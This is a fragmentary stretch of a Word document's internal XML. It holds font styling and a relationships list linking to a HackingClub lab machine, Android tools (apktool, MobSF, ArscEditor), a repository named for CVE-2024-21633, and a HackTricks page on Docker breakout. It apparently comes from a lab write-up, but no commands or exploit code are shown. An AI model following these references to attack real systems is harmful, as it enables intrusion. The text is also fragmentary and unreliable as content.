      <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      <w:i w:val="1"/>
      <w:iCs w:val="1"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="2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jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      <w:i w:val="1"/>
      <w:iCs w:val="1"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="2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17.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hyperlink" Target="https://github.com/MrIkso/ArscEditor/releases/download/1.0.2/ArscEditor-1.0.2-all.jar" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/MrIkso/ArscEditor/releases/download/1.0.2/ArscEditor-1.0.2-all.jar" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><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7.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.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https://app.hackingclub.com/laboratory/competition-machines/227"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8.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/MobSF/Mobile-Security-Framework-MobSF" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.kali.org/tools/apktool/" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/index.html#mounting-disk---poc1" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/0x33c0unt/CVE-2024-21633" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.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yperlink" Target="https://www.kali.org/tools/apktool/" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/simplificator/phonegap-helloworld/raw/refs/heads/master/android/bin/Hello%20World.apk" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1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x/RjS/03gdp4KHuQXIdZ+F6J8A==">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